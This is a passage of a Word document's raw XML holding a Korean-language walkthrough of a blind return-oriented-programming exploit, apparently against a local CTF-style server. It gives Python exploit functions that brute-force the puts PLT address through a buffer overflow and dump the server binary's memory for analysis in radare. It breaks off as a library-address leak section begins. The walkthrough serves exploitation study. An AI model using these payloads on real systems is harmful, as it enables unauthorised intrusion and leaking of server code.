              <w:t xml:space="preserve">        return addr</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="57653AD2" w14:textId="4141BD27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12025D55" w14:textId="77777777" w:rsidR="000A7E3A" w:rsidRDefault="000A7E3A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2D195E41" w14:textId="4CB6A438" w:rsidR="006B77A1" w:rsidRDefault="000A7E3A" w:rsidP="000A7E3A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:ind w:left="1000" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Puts_plt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>찾기</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068B917C" w14:textId="0F21A725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G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>adget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 얻었다면 서버의 바이너리를 유출하기 위하여 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">puts_plt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>함수를 찾아야 한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1915DEFB" w14:textId="40684958" w:rsidR="000A7E3A" w:rsidRDefault="000A7E3A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E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">LF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>바이너리의 e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ntry point</w:t>
      </w:r>
      <w:r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/>
        </w:rPr>
        <w:t>0x400000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 기준으로 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 w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">씩 더해가며 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>puts_plt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 찾고,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> ELF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">바이너리의 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>magic byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">인 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>\x7fELF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>tdout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에 출력되면 이를 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>puts_plt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 판단하였다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E595B06" w14:textId="15C6CBF7" w:rsidR="006B77A1" w:rsidRDefault="002754C1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다음은 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>puts_plt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 찾는 과정이다.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4A11D406" w14:textId="77777777" w:rsidTr="002145E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DBA2793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>def find_puts(over_len, pop_rdi):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="298CF65D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1FD41DF6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if i%0x100 == 0:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="278E277B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log.info('try.. {}'.format(hex(i)))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="138D6D9B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try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33B29792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ab/>
              <w:t xml:space="preserve">    # find puts_plt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="656D81B8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s = connect('localhost', 10001, level='error') # connect to server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35166D33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pay = 'a'*over_len</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="386812F2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pay += p64(pop_rdi)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BABAA74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pay += p64(0x400000)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53B6E421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pay += p64(base+i)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A5AA479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s.sendline(pay)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="726491AB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data = s.recvuntil('\x7fELF')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1735338D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ab/>
              <w:t xml:space="preserve">    # if we got a \x7fELF (ELF Format Magic Byte), base+i is a puts_plt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F076762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ab/>
              <w:t xml:space="preserve">    # and this means we are able to leak binary in the server !</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A161F87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if '\x7fELF' in data:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DC43A83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    log.info('puts%plt: {}'.format(hex(base+i)))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C057D78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39AB422E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    return base+i</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A16B387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lastRenderedPageBreak/>
              <w:tab/>
              <w:t># if nothing print in the stdout, fails</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53F2338F" w14:textId="77777777" w:rsidR="002145E3" w:rsidRPr="002754C1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43310176" w14:textId="540DE0A3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754C1">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">            s.close()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="555516A3" w14:textId="77777777" w:rsidR="002145E3" w:rsidRDefault="002145E3" w:rsidP="006B77A1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353E35C1" w14:textId="2083D00A" w:rsidR="002754C1" w:rsidRDefault="002346CF" w:rsidP="002754C1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346CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BD0D277" wp14:editId="15272056">
            <wp:extent cx="3810000" cy="4562475"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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49B9874-BF62-4F91-B14B-6BD076671F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249B9874-BF62-4F91-B14B-6BD076671F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5624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56A67A4" w14:textId="77777777" w:rsidR="000A7E3A" w:rsidRDefault="000A7E3A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7C81DCAE" w14:textId="4C64E67A" w:rsidR="000A7E3A" w:rsidRPr="000A7E3A" w:rsidRDefault="000A7E3A" w:rsidP="004A7AE9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:ind w:left="1000" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Memory dump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>하기</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D873CD" w14:textId="77777777" w:rsidR="004A7AE9" w:rsidRDefault="002754C1" w:rsidP="002754C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uts_plt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 알아냈으면 출력함수를 사용할 수 있다</w:t>
      </w:r>
      <w:r w:rsidR="002346CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="004A7AE9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이를 이용하여 </w:t>
      </w:r>
      <w:r w:rsidR="004A7AE9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>0x400000</w:t>
      </w:r>
      <w:r w:rsidR="004A7AE9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">부터 </w:t>
      </w:r>
      <w:r w:rsidR="004A7AE9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>puts_plt</w:t>
      </w:r>
      <w:r w:rsidR="004A7AE9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 입력하여 바이너리를 유출하고,</w:t>
      </w:r>
      <w:r w:rsidR="004A7AE9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A7AE9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>덤프한 메모리를 파일로 생성한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7080C83C" w14:textId="78EEEA7B" w:rsidR="002754C1" w:rsidRDefault="004A7AE9" w:rsidP="002754C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Puts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>NULL Byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">까지만 출력하기 때문에 출력값이 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이라면 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>\x00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 기록하며 이 외에는 출력된 값을 더해주었다.</w:t>
      </w:r>
      <w:r w:rsidR="002754C1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002754C1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A67469" w14:textId="545CD0D3" w:rsidR="004A7AE9" w:rsidRDefault="004A7AE9" w:rsidP="002754C1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또한 p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">uts </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">마지막에 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>\x0a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">가 들어가기 떄문에 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이를 방지하기 위하여 \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>x0a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 따로 제거해주는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>routine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 따로 추가해주었다.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715D5BB6" w14:textId="77777777" w:rsidTr="002145E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25442685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>def memory_dump(size,stop_gadget,rdi_ret,puts_plt):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4286958E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now = base</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40244F3D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end = 0x401000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C00AB28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dump = b""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50B2E8C2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while now &lt; end:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A984266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if now % 0x100 == 0:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E3840C9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log.info("Progressed to  0x%x" % now)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F1A3112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# dump binary using puts_plt from the 0x400000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AD92F0A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r = connect('localhost', 10001, level='error') # connect to server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78EE98FA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= b''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="746FA2E2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+= b'A' * size</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79C89FE0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+= p64(rdi_ret)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20AA443F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+= p64(now)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F08DFB5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+= p64(puts_plt)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="527AECC8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payload += p64(stop_gadget)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50DAA02D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r.recvuntil(b'WelCome my friend,Do you know password?\n')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E3FD149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r.send(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="214CCFCA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lastRenderedPageBreak/>
              <w:t xml:space="preserve">        try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ACC2C03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data = r.recv(timeout=0.5)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25C12856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r.close()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E353C63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data = data[:data.index(b"\nWelCome")]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B5A974D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except ValueError as e:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D6B5032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data = data.rstrip(b'\n')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58F0653B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except Exception as e:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="196864D3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continue</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54F0A4B4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if len(data.split()) == 0:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EEB741E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    data = b'\x00'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19D27DDD" w14:textId="77777777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dump += data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25FD0656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4A7AE9">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">        now += len(data)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61A3B4E6" w14:textId="3A533AA1" w:rsidR="002145E3" w:rsidRPr="002346CF" w:rsidRDefault="002145E3" w:rsidP="004A7AE9">
            <w:pPr>
              <w:pStyle w:val="a3"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:ind w:firstLineChars="200" w:firstLine="400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with open('memory.dump','wb') as f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09B7F5CC" w14:textId="56060F99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f.write(dump)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46C3013D" w14:textId="5101E1B6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덤프 파일</w:t>
      </w:r>
      <w:r w:rsidR="004A7AE9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 생성 되면 리버싱 툴인 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>radare</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 이용하여 분석</w:t>
      </w:r>
      <w:r w:rsidR="004A7AE9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503CEDBD" w14:textId="6BF19C58" w:rsidR="004A7AE9" w:rsidRDefault="004A7AE9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Gdb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">가 아닌 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>radare</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 통해 분석한 이유는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>radare</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">는 바이너리 포맷에 맞지 않은 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">dump </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">파일도 분석할 수 있는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>debugger</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>기 때문이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C39A5D8" w14:textId="744D7E55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346C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BF47631" wp14:editId="4C67249F">
            <wp:extent cx="4838700" cy="3171825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="307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4A98605-B68F-4EDF-996A-07F5868E0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>
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64A98605-B68F-4EDF-996A-07F5868E0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718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74F3E39" w14:textId="1612FD81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71940DCF" w14:textId="40048FC6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346CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A0C7267" wp14:editId="18D2A82B">
            <wp:extent cx="5731510" cy="2008505"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="308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1F80C9B-5C02-4717-829D-B18BEDB321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>
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31F80C9B-5C02-4717-829D-B18BEDB3219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E76F8" w14:textId="2F07BA61" w:rsidR="004A7AE9" w:rsidRDefault="004A7AE9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5685EFFB" w14:textId="3150516E" w:rsidR="002346CF" w:rsidRDefault="004A7AE9" w:rsidP="004A7AE9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:ind w:left="1000" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Lib</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>주소</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>유출</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408218D6" w14:textId="0B381F0C" w:rsidR="004A7AE9" w:rsidRDefault="004A7AE9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앞서 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>radare</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">로 확인한 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>puts_got</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의 주소를 이용하여 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
